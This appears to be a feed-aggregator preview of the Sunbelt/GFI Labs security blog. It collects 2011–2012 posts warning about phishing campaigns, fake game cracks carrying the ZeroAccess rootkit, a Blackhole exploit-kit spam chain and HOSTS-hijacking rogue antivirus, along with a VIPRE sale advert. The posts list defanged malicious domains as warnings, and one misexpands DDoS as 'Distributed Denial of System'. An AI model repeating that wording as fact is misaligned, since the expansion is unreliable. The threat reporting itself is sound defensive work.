Subscribe: Sunbelt Blog
http://sunbeltblog.blogspot.com/atom.xml
Added By: Feedage Forager Feedage Grade B rated
Language: English
Tags:
account  adverts  christopher boyd  click  dot  email  file  jovi umawing  jovi  new  page  steam  umawing  user  users 
Rate this Feed
Rate this feedRate this feedRate this feedRate this feedRate this feed
Rate this feed 1 starRate this feed 2 starRate this feed 3 starRate this feed 4 starRate this feed 5 star

Comments (0)

Feed Details and Statistics Feed Statistics
Preview: Sunbelt Blog

GFI LABS Blog



A blog about activities, products and ideas at GFI, one of the leading developers of security software to protect against spyware, spam and other threats.



Updated: 2016-06-29T02:56:03.552-04:00

 



Moving House

2012-01-16T01:33:33.032-05:00

Yes, we are :)
(image)
Click the image to visit the new GFI Labs Blog

An inevitable move, this. After all, Sunbelt Software has been part of GFI Software for more than a year now.

This didn't happen overnight, though. We tip our hats to our colleagues in Malta who worked hard to put up our new home and brought the Labs under one domain. At the very least, you, dear Reader, are now spared the confusion of whether to call this website the "Sunbelt Blog" or the "GFI Blog" ;)

What you're reading here now is our 4,100th published post; it is also our last. We're just glad that our "Goodbye!" is short-lived.

Moving to a new home is just the start of better changes that are about to take place. To continue receiving the latest research and noteworthy information security news from us, we urge you to update your RSS to point to the new GFI Labs Blog feed.

Cheers to all of our avid readers! Chris and I will see you on the other side :)

Jovi Umawing



Phishers Use US-CERT Email Address as Bait

2012-01-12T03:59:51.336-05:00

The United States Computer Emergency Readiness Team (simply known as US-CERT) is the latest bait phishers used to get users to install malware on user systems.

US-CERT is a highly esteemed and trusted body of security professionals who tackle cybersecurity issues in the United States. They also work with security vendors to address vulnerability issues. With such impressive credentials, it is possible that some private organizations, including federal, state, and local governments, might have fallen prey to this campaign since they appear to be the targets.

From the US-CERT website: "Reports indicate that SOC@US-CERT.GOV is the primary email address being spoofed but other invalid email addresses are also being used.

"The subject of the phishing email is: "Phishing incident report call number: PH000000XXXXXXX" with the "X" containing an incident report number that varies.

"The attached zip filed is titled "US-CERT Operation Center Report XXXXXXX.zip", with "X" indicating a random value or string. The zip attachment contains an executable file with the name "US-CERT Operation CENTER Reports.eml.exe", which is a variant of the Zeus/Zbot Trojan known as Ice-IX."


The complete report is found here.

Jovi Umawing



StalkTrak App gets Naked, Famous.

2012-01-12T00:00:40.695-05:00

allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/WkWpx6bi0a8" width="500">

"No way" indeed.

The Naked and Famous were displaying the following Tweet on their feed earlier:

Click to Enlarge

Visiting hampaw(dot)ru takes the end-user to tivvitter(dot)com/twitter_stalk-trak_app_user, where they are presented with an application install page for something called "StalkTrak":

Click to Enlarge

Click to Enlarge

The end-user can only progress to the next page if they enter both a username and a password - continuing past this screen will result in links to "StalkTrak" being sent to their followers.

Stalking apps are an old and tired scam dating back to the Myspace days, but unfortunately we continue to fall for them. Please steer clear of the above URL, and think twice before allowing any applications involving "Stalking" to access your Twitter account. You can always clean up your Twitter account here by revoking access to unwanted applications.

Christopher Boyd (Thanks to Jovi Umawing for assistance)



GFI's Take on What Online Crime Will be Like in 2012

2012-01-11T10:24:30.635-05:00

In a recent release of GFI Software's VIPRE report, GFI Labs revealed that recycled tactics from cybercriminals will not cease this new year. Modifications on these tactics will only be slight, and will depend greatly on the kind of targets these online criminals are aiming at. To quote Senior Threat Researcher Christopher Boyd: "Most cyber-attacks at any given time rely on old techniques deployed with a new disguise. The reason we see them again and again is quite simply because they work, and we anticipate 2012 to bring many fresh takes on old scams."

You can read more about this report here.

Jovi Umawing




Bogus Video Game Crack Leads to Rootkit

2012-01-11T01:07:22.390-05:00

Matthew, one of our malware researchers at the AV Labs, came upon a MediaFire link on a YouTube account that purports to direct users to a site where a crack code for the video game Pro Evolution Soccer 2012 (PES 2012) (otherwise known as World Soccer: Winning Eleven 2012) can be downloaded.

click to enlarge

Of course, one doesn't need to go hunting for a YouTube page for the URL. Here it is: http://www(dot)mediafire(dot)com/?i1o0fsa9t5gvpld.

Users visiting the page can readily download and extract the compressed file Pro Evolution Soccer 2012 Keygen. In it are three files: an HTML file, a text file, and another compressed file, which contains the key generator application. The text file doesn't actually contain the password it claims to have. Instead, it contains a shortened URL users must visit to get the password from.

click to enlarge

http://tinyurl(dot)com/64ad4m is actually http://lnkgt(dot)com/7RM, a survey page that users must answer before their password is given to them.

click to enlarge

Unfortunately, after users fill in the survey, gets the password to be used to run the keygen, they inevitably end up installing malware on their systems. Not just any malware; it's a rootkit: ZeroAccess, a sophisticated rootkit known for overwriting critical OS files. Luckily, almost all AV vendors detect this one. Take a look.

Do note that the MediaFire URL is also mentioned on other website platforms that allow the embedding of video clips (such as the one below).

click to enlarge

The more the URL is out there, the more likely someone can and will install the rootkit onto their systems. Stay safe, everyone!

Jovi Umawing (Thanks, Matthew)



2011: The Year that was for Facebook and Online Threats

2012-01-04T03:53:23.397-05:00

CommTouch, an Internet security service provider, has recently released their Internet Threats Trend Report for 2011. In this report, they have highlighted and analyzed the various threats on Facebook that had plagued users for the past year, such as social engineering ploys and common methods of attack used. They also identify three ways on how criminals gain and what these are for targeting Facebook users. CommTouch provided an infographic (below) to showcase their analysis in a more coherent format.

(image)
click to enlarge

The 19-page Internet Threats Trend Report mentions malware and spam trends in Q4 of 2011. It also ranks website categories that are most likely to house malware if compromised—Sites tagged as Pornography are at #3. Below are other notable finds in summary:
  • India, Vietnam, and Pakistan were the top three countries with the most zombie computers.
  • Phishers mostly targeted sites that were related to Games and Gaming.
  • In Q4, spammers used fake @gmail.com email addresses to trick users into responding to their spam messages.
The report can be downloaded here.

Jovi Umawing



Team Meat Spun Right Round

2012-01-01T21:17:47.227-05:00

"It's fine, trust me. I've done this stuff for a while now." Famous last words.

Team Meat, developers of Super Meat Boy, had a bit of an issue this past week when their Super Meat World database was compromised. This resulted in the game being broken, and all user created levels being deleted.

They were notified by a person in this thread on Twitter that access to their database was wide open, but the responses from the official Meat Boy account seemed to be a bit of a brush off in the eyes of some watching the drama unfold. Before you could say "This is going to go horribly wrong", it all went horribly wrong and login details were posted across various forums.

The post it notes summary of events can be found here; a thread on the official forums lies this way and if you'd rather take in the full horror of an entire game being put through the wood chipper then check out this blow by blow account. The game is now back up and running, but we have what may be the final game developer of 2011 to join the "Whoops, we were hacked" company of Sony, Square Enix, Steam, Nintendo, SEGA, Bethesda, EA, Codemasters, Epic and others.

Let's see if the trend continues in 2012, assuming the Mayans don't get us all first...

Christopher Boyd



Steam: All your coal are belong to us

2011-12-30T05:40:23.936-05:00

The rather awesome Steam gaming platform has a festive competition running at the moment - perform certain tasks in a selection of games drawn each day (or sign up to a few non gaming activities like join a forum, or link your Steam and Facebook accounts) and receive a free random gift. I have to admit - I'm not doing very well so far.Click to EnlargeThat gift could be a redeemable coupon for a free game, a discount or...a lump of coal. All is not lost should you be handed a lump of coal - collect seven, and you can craft it into another randomly selected discount or free game.Click to EnlargeThis is, of course, where it all goes horribly wrong.1) Gamers are exploiting the various "Indie Bundle" packs that go on sale periodically. This particular gaming bundle is a "pay what you want" affair, typically stuffed full of great games and additional offers should you pay a little extra (we still need to have that talk, Windows users). The latest Humble Indie Bundle went live not so long ago, and in a mad dash to create as much coal as possible to increase the chances of free games in Steam gamers were paying the base amount for Indie Bundles, redeemable against Steam accounts.From Platform Nation: "For just 1 penny you can nab yourself a Steam redeemable key, and make your account valid for entry in the Epic Giveaway and the freebie prizes. That means you can create 100 accounts for just $1"Whoops. They must have really gone to town on that one, given that the mass purchasing caused the price of the bundle to drop by more than 25 cents.Greedy gamers have also been targeting the "IndieGala Bundle" which gives a separate Steam account for each game - effectively five duplicate accounts for the lowest potential price of a penny. Once you've got your hands on all those wonderful discount coupons and free games, you can potentially gift them to your "main" account and sit upon a throne of murkily acquired titles.2) With shades of Xbox achievement tampering, people are distributing save files / text files to unlock Steam game achievements needed to win coal / coupons. Here's an example of someone loading up a file not belonging to them, nabbing the required achievement in Binding of Isaac and getting their hands on a free game. That's kind of dreadful, and by "kind of" I mean "completely".3) Gamers are firing up a Steam achievements modding tool, to ensure they nab as much coal as possible.Click to EnlargeHere's someone who clearly went on an "unlock all the things" rampage. As you can imagine, these antics are not proving popular with non cheating gamers.Coal farming isn't going unpunished, and Valve are starting to clamp down on anyone seen to be farming and / or exploiting. You may well be seeing many more examples like the below on forums posted up by vaguely annoyed gamers who want their accounts reactivated:Click to EnlargeIf Valve catch you being naughty this festive season, they won't even leave you with coal. Top that, Santa...Christopher Boyd[...]



Hobbits and surveys: not a good combination

2011-12-22T01:50:12.842-05:00

It's not long since The Hobbit trailer made a lot of people very excited, and already we're seeing fake claims of "watch this movie online" leading to surveys.

For example:

 Click to Enlarge

Click to Enlarge

You know the drill - fill in the survey to "view the content", then fail to be impressed by the total lack of content on offer. You'll either see nothing at all, or websites asking you to sign up to monthly fees. Don't fall for it!

Christopher Boyd (Thanks Robert)



Phishers are Back to Target Chase Clients

2011-12-20T06:53:52.643-05:00

Robert Stetson, one of our malware researchers at the AV Labs, found a new phishing scam in the wild.

The scam arrives as an email that directs users to the URL, data-server(dot)host(dot)org/email/protect/chase/.
click to enlarge

After Chase clients provide their credentials into the fields of the purported legitimate bank page and click Log on, they are then directed to another UI where they are to enter their email address and its password.
click to enlarge
click to enlarge


Chase clients, please be duly warned about this. For the rest, please delete from your inbox doubtful mails that purport to come from banks (including yours). If you received an email from your bank about your account, confirm with them via customer service.You know what they say: Better safe than sorry.

Jovi Umawing (Thanks to Robert)



"Curious Who's Stalking You?" - Yes, we've heard it before

2011-12-16T10:26:08.513-05:00

This social media "stalking" thing, to the best of my knowledge, all began on MySpace. We've seen them emerge on Twitter, too: our friends at Sophos wrote a so-called "app" that Twitter purportedly released to track a user's stalker. Only this time, no such app is ever involved.click to enlargeWe've seen the tweet above pointing users to the URL, canbin(dot)ru—a domain created just late last month. Once users click it, they are then directed to twvitter(dot)com/user_login-sessions/?timed_out=1. It's a phishing page.click to enlargeThere are two things we can take note from it: (1) the URL, which clearly tries to play tricks with our eyes (much like this one), and (2) the purported Twitter session that has timed out. Naturally, if one is logged onto Twitter and sees the message, they'll wonder for a second, and then unknowingly key in their user name and password anyway. Perhaps the only "error" we can see in this attack is that the site attempts to access the actual Twitter site the same way a real third-party app or site would to make everything seem legit. However, Twitter requires tokens from such apps and sites. Since we know that this is a bogus page, it doesn't have a token; thus, it can't successfully redirect users to their actual accounts as it was supposed to.click to enlargeWe impore you, Dear Reader, to please exercise caution when clicking links on tweets. Even better: use your better judgment on whether you'd believe a supposedly interesting tweet or not before considering visiting the URL that goes with it. More often than not, scam tweets are designed to sound this way to actually make Internet users click them. Please don't be fooled. Just like the "Girl Killed Herself" scam that made rounds within Twitter not so long ago, this, too, will probably go down in history as a classic attack involving two social networking giants. This is not a comforting news. As long as user continue to fall for scams, they will just keep coming.Jovi Umawing (Thanks to Chris for spotting this)[...]



Protecting Against DDoS is Probably THE Best Holiday Gift to Give Your Company

2011-12-14T06:19:27.421-05:00

For the lot of us who rely on the Internet to get news updates, we are made familiar with Distributed Denial of System (DDoS) attacks. Anonymous being on the headlines continuously for months made this kind of online crime conspicuous, even ushering it unexpectedly to the realm of mainstream.

DDoS attacks have been used not just by the aforementioned group but also by other groups and individuals for various reasons: making a stand for what they believe in, showing support for the beliefs of others, or doing it "just because". We can't deny the fact that names of companies that fell prey on DDoS attacks were huge and they encompass industries, but one cannot totally eliminate the very likely possibility of small- and medium-sized businesses being targeted as well.

Those whose businesses have an online presence are aware and worried, and if possible, they want to be protected from DDoS attacks. So how can this be done? InfoWorld published an article that tells business people just that. You can check it out here.

Jovi Umawing



Adblock Fuss

2011-12-13T13:47:33.293-05:00

I'm a big fan of Adblock Plus - it's a great add on if you don't want to be hit over the head with any number of spinning, flashing adverts torn straight from the pages of Dante.However, an interesting change has been made to the program with the release of 2.0 and some users are up in arms about it:Click to Enlarge"Adblock Plus has also been configured to allow non-intrusive advertising. You can change this selection at any time in the filter preferences."Blasphemy? Madness? Sparta? Who knows, but we now have a situation where users aren't happy about the opt in by default setting, or indeed approving adverts in general no matter how limited the scope. There's a page on the Adblock Plus site that outlines some of the reasons for this change:"You can allow some of the advertising that is considered not annoying. By doing this you support websites that rely on advertising but choose to do it in a non-intrusive way...In the long term the web will become a better place for everybody, not only Adblock Plus users. Without this feature we run the danger that increasing Adblock Plus usage will make small websites unsustainable."As for why this is set live by default:"If we ask users to enable this feature then most of them won't do it — simply because they never change any settings unless absolutely necessary. However, advertisers will only be interested in switching to better ways of advertising if the majority of Adblock Plus users has this feature enabled."I'm not entirely convinced that advertisers so fond of flashy, spinning adverts from the back of beyond will tone their adverts down just because of this move - and hey, let's not forget that adverts meeting the requirements to be potentially given the green light ("static ads, text only, no attention grabbing images") can be just as dangerous if not more so than the flashy horrors still on the blocklist.One good thing that may come out of this move is a possible reduction in infections. No really, hear me out. I know a lot of people who have told me they never installed Adblock Plus or similar programs because their income was primarily driven by dedicated communities, and they wanted to put something back into those communities by not blocking their (static) advertisements. For example, a professional comic artist or writer is supported by their community; as a thank you, they won't block the adverts on the sites belonging to their fans or webcomic rings.As a result, quite a few of them were hit by drive by installs and exploits while browsing the web with no ad blockers in place.If the Adblock Plus team do a good job of this, it might actually encourage more people to now try the program and let a few (hopefully harmless) adverts through while using their new found installs to block malicious adverts elsewhere with a clean conscience.That can only be a good thing. However, much will depend on their examination of the approved advert networks, their advertising methods, the kind of links those advertisers allow (and how they react to the bad apples that slip through the net) and whether or not the userbase approves of the opt in by default setup.We'll have to wait and see how this one plays out...Christopher Boyd[...]



Blackhole Exploit Hones in on Amazon Users

2011-12-13T10:14:35.402-05:00

Last week, our friends at ThreatPost posted about the ever-growing infection of websites hosting Black Hole Exploit Kits. A Black Hole exploit takes advantage of unpatched Windows operating systems. It also targets other software, such as Java and Adobe Reader, that can be installed on Windows platforms, which are a lot. Since the kits are already available in the black market (for free), we can only expect more infections and news surrounding this particular kit.

And, oh: Facebook users should watch their backs, too.

Our malware researchers at the AV Labs, Robert and Matthew, has seen something in the wild that might spoil the holiday spirits a bit. It began as an email message supposedly from Amazon with the subject "Your Amazon.com order of Omron WXH-108F Fat Loss... has shipped".

click to enlarge

Clicking any of the links on the email body directs users to jongerencentrumdebus(dot)nl/wp-content/uploads/fgallery/news.html, a likely compromised site, and then directs to ageoloft(dot)info/main(dot)php?page=525447c096f8efbf, a known Black Hole Exploit Kit host.

click to enlarge

The said ageoloft(dot)info automatically downloads a .PDF file (an exploit) onto systems. This then exploits Adobe Reader to run malicious executable files on these systems. Furthermore, a worm, which GFI Software detects as Win32.Malware!Drop, is downloaded onto systems.

We detect the exploit page as Trojan.JS.Obfuscator.w (v); the PDF file that is part of the kit, Exploit.PDF-JS.Gen (v).

With the number of Internet users shopping online using services such as Amazon and eBay, it pays to be cautious fourfold, especially at this time of the year. Criminals know when and how users—you—spend their time there.

Jovi Umawing (Thanks to Robert and Matthew)



More bad ads in Bing, Yahoo search

2011-12-09T12:11:28.123-05:00

Another round of bad ads in Bing and Yahoo search are making an unwelcome return. Bing has fake Firefox adverts: Click to Enlarge Click to EnlargeYahoo has fake Adobe Flash adverts instead, located at gripwise(dot)com(dot)au/player/: Click to Enlarge Click to EnlargeAs you can see from the below screenshot, the Gripwise URL where this is located appears to have been compromised: Click to EnlargeBoth sites will give you the Privacy Protection rogue, and the domain used for the fake Firefox download (ipropertyoffice(dot)com) has active exploits so please steer clear. VirusTotal scores weigh in at 17/43, and we detect as Win32.Malware!Drop.Click to EnlargeAt time of writing, Microsoft have been notified and have said the adverts have been pulled. All the same, be very careful when clicking on sponsored adverts for common downloads such as Firefox, Flash and others. As we've seen time and time again, scammers are all too eager to push malicious files on unsuspecting users.Christopher Boyd (Thanks Matthew)[...]



Holiday Horrors: food stamps, phish and PDFs

2011-12-07T20:24:41.449-05:00

Our monthly Top Ten threat detection report for the month of November is now available to take a look at, along with information on some of the scams we've seen these past few weeks including emails tempting users with infected PDF files, food stamp shenanigans involving mobile phone services and phishing emails containing HTML form attachments, some of which are still doing the rounds.

The Top Ten can be viewed here.



"For your protection, your Barclays account has been suspended..."

2011-12-07T20:08:12.962-05:00

If you see an email arrive in your mailbox with the above title, feel free to discard it - nothing good will come of it, unless your idea of "good" is "filling in all of your personal information into a fake banking webpage then sending it to a scammer."

The missive is sent from a free Yahoo email address, and works along the same line as these scam mails from a few weeks ago.

Click to Enlarge

They claim your account has been suspended due to a large number of incorrect login attempts, and reactivation is a case of filling in the attached form before the 9th of December - otherwise your account will be disabled. With a fake time limit imposed on the customer, they open up the attached HTML form and see that it asks for an awful lot of information. Name, membership number, passcode, date of birth, mother's maiden name, address...

 Click to Enlarge

Of course it gets worse. Before you know it, our panicked bank customer is filling in their sort code, account number, telephone banking password and the three digit security code from the back of their card.

Click to Enlarge

Once all of this is done, hitting the "Next" button submits the data to the scammer then redirects to the Barclays website. Please avoid mails such as the above and keep your money where it belongs - your bank will never email you asking for account information (and they certainly won't email you from a free webmail account!)

Christopher Boyd



"Steam Birthday" crashed by party poopers

2011-12-05T10:05:26.348-05:00

Here's a rather amateur phish targeting Steam users, located at steambirthday(dot)com. No birthday prizes for guessing what this scam is all about:

Click to Enlarge

You know you're dealing with a special kind of phish when the opening ramble begins with "Steam is 3 years old: the Steam project started in 2003" and "In a really short time our servers became more and more and today there are more than a thousand meters of them".


According to the website, Valve - the creators of Steam - are giving away "1000 Gold accounts, which will allow you to play all 72 games for free" (Steam actually has 1,400+ titles available for download). Hitting the gold coloured "Upgrade now" button takes the end-user to a brilliantly convincing phish page. Or, to be more accurate, it takes them to missing images and screwed up HTML code:

Click to Enlarge

The site is already flagged in Chrome as a phish page, and hopefully IE and others will follow suit soon. For now, let's hold off on the birthday celebrations.

Christopher Boyd



New Facebook Worm in the Wild

2011-11-29T05:40:18.935-05:00

Our friends at CSIS, a Danish security company, has spotted a worm spreading within the Facebook platform. In a recent news article penned by Peter Kruse, the worm is said to be "a classic" one in terms of how it infects Internet users: uses stolen credentials to log in to Facebook accounts and then spam contacts. The message is said to contain a link to a file purporting to be an image—Screenshot of the file shows it has a .JPG extension—but it's actually a malicious screensaver. Once run, it drops a cocktail of malicious files onto the system, including ZeuS, a popular Trojan spyware capable of stealing user information from infected systems.

The worm is also found to have anti-VM capabilities, making it useless to execute and test in a virtual environment, such as Oracle VM VirtualBox and VMWare.

Please keep in mind that securing your information, including your social network credentials, is a must. Never unknowingly click links on messages sent over by online contacts. Make sure that they did send messages to you first before doing something; else, it is best if you simply delete them from your message inbox.

Jovi Umawing



FakeScanti Rogue Hijacks HOSTS Files

2011-11-28T17:48:11.449-05:00

Patrick, our resident rogue AV expert from the AV Labs, have his eyes set on one particular family—FakeScanti. This rogue family first appeared in the first quarter of 2010, and it has been within the radar ever since.

Enter AV Protection 2011.

This particular rogue is the latest variant in a handful of noteworthy rogues within the FakeScanti family. What's interesting about it is that it modifies the infected system's HOSTS file upon execution, a capability common to backdoors and worms. AV Protection 2011 directs users to 46(dot)4(dot)179(dot)109, a malicious IP in Germany where AV Secure 2012, another FakeScanti variant, is housed. It does this when users enter either google.com, yahoo.com, bing.com, or facebook.com in the Internet browser address bar.

click to enlarge

Internet users can encounter this rogue if they are led to pages via search engine optimization (SEO) technique or via a spammed link where, once visited, downloads a Blackhole exploit kit where this rogue AV is bundled with. We detect AV Protection 2011 as Trojan.Win32.FakeAV.IS (v). We can also detect and clean the modified HOSTS.

If you may recall, this isn't the first time HOSTS files are hijacked by criminals to dupe users in so many ways. In this particular situation, phishers modified the HOSTS to direct users to fake pages of popular banks, such as Bank of America and Citibank, whenever they key in the legitimate bank URLs in the address bar.

Users are advised to be wary of clicking links in emails. If you didn't contact the party that sent such mails, it's always best to not bother yourself with them and delete them from your inbox. Be careful with how you do searches online as well, since the criminals behind rogue AV are still banking on the old yet very effective SEO technique.

Jovi Umawing (Thanks to Patrick)



"Così fan tutte"

2011-11-28T11:05:31.191-05:00

A company who make installers distributing the software of third parties recently contacted us to query a detection. As it turns out, their installer was not the problem - they were partnering with a company whose toolbar continues to have a history of misleading and deceptive installs.The interesting part of all this was the discussion over how the programs caught the attention of the end-user in the first place. Here, it was big green download buttons on download sites that looked (for all intents and purposes) like the button the end-user should click on to begin their desired download. Instead, it would take them to vaguely named installer files. Examples of said buttons: Click to EnlargeClick to EnlargeAs a response, the basic argument set forth was "We want to be clean, but it's so difficult when everybody else is doing whatever they can to snag an install over a company attempting to play by the rules". On the surface of it, this would seem to be the case - pre ticked checkboxes, dubious installers and poor notification inside the programs we download are bad enough, but poor choice of advert placement (and adverts that themselves look like Facebook notification prompts and other elements that would fool a regular web-user) muddy the waters still further.You can see these on everything from search engines to garden variety adverts on any number of websites you care to mention, and as social networks continue to grow in influence so too do 2.0 themed adverts continue to vie for your attention.Disappointingly, the bulk of the case set forth boils down to "everyone else is doing it". Here are some of the examples they sent over: Click to EnlargeAbove you can see a rather large green tick and a "Download now" button which completely overwhelm the simple text link that happens to be the one the end-user is looking for. Click to EnlargeThe above example has a rather prominent (and unrelated) download banner at the top and another download link off to the right - personally I don't feel this has as strong a case as the first example, although three green download buttons on the same page is always going to cause confusion for somebody.Click to EnlargeAbove, we can see the actual download button fairly dwarfed by a larger one off to the right. Much like the other two, you can bet this has resulted in a number of "Wait, what?" style downloads.None of this is new, of course - you can easily jump back to 2008 or earlier and see the same sort of thing taking place on Facebook application installer pages. It's worthwhile advising relatives you suspect will wander into these setups to be on their guard, because as far as many companies out there installing Adware and other products are concerned it's a case of Così fan tutte.Christopher Boyd (Thanks Eric)[...]



"Rogue browsers will make a comeback on the mobile platform."

2011-11-24T11:42:59.403-05:00

We've seen it here first: YapBrowser has risen after being declared dead five years ago—and this discovery is by Chris Boyd himself just a day before he presented at VB 2011 to discuss about rogue browsers, of which YapBrowser is.

If you missed the said conference or Chris's presentation, this podcast hosted by our friends at Help Net Security contains a comprehensive, lightning talk from Chris about rogue browsers, their history, their numerous payloads, and the possibility of them plaguing smartphones.

Not long ago, our friends at Trend Micro spotted the first rogue browser for Windows Mobile, Symbian OS, and Android phones, disguising as Opera Mini, a popular Web browser for mobile phones. This could be the start of a new trend. What we're sure of is that fake browsers are still out there, even if under the radar and on different platforms.

Jovi Umawing



Phish for Thanksgiving?

2011-11-23T21:00:16.191-05:00

Over the previous few days, our research team here at GFI has noticed an uptick in bank phishes winding up in a few of our spam traps. This particular scam is unique in that it comes with an html file attachment which leads to a form that attempts to steal from the unsuspecting victim all types of identifying information from the standard pin and password to their Driver’s License number and even a (fake) description of the last transaction made on the account.

(image)
As of this posting, we have seen e-mails targeting Bank of America and SunTrust customers and surely more will follow.

(image)
As always, please be wary of e-mails from financial institutions asking for identifying information. When in doubt, call the official phone number listed on the back of your credit card or the known customer service line for your bank.

So, while "fish" was likely a staple eaten during the days of the pilgrams, we here in the lab are going to stick to good ol' turkey this year.

Stay safe,

Robert Stetson
Malware Research Team



VIPRE Black Friday Special

2011-11-25T07:40:00.361-05:00

Here at GFI, we’re dedicated to providing quality antivirus software at exceptional values, and this Black Friday is no exception. Our Black Friday Sale features the biggest discounts of 2011 – up to 75% off.

Black Friday Sale

VIPRE Antivirus 2012 for $39.95 NOW $9.95!
VIPRE Internet Security 2012 for $49.95 NOW $19.95!

With prices this low, you can give the gift of PC security to Grandma, your sister, even that crazy uncle. Is Santa bringing a new laptop this year? Make sure he installs VIPRE on it first! It defends against viruses, worms, spyware, Trojans, rootkits and other Internet threats without slowing down your new (or old) PCs. The VIPRE 2012 editions feature the latest threat definitions and are easier to install and use than ever before.

This weekend’s VIPRE Black Friday Sale makes it easy and affordable to keep your family safe online this holiday season (and in years to come). So take advantage of the lowest prices of 2011 while the deals last.




From porn stars to strippers: careful with name games

2011-11-22T07:13:34.369-05:00

Way back in 2009, Sophos covered a bit of viral "fun" on Twitter where users of that service revealed their "porn star name" - comprised of your "first pet" and your "first street".

Well, look what's back in marginally altered form and racking up 8,000+ reblogs on Tumblr:

Click to Enlarge

Or, you know, don't. Stop and think how many services still ask for your pet name and street name on things such as password reset questions. Then pause to consider an email address you use may be public facing, and have just such a question bolted onto it.

You may want to keep your clothes on and stick to the day job at that point...

Christopher Boyd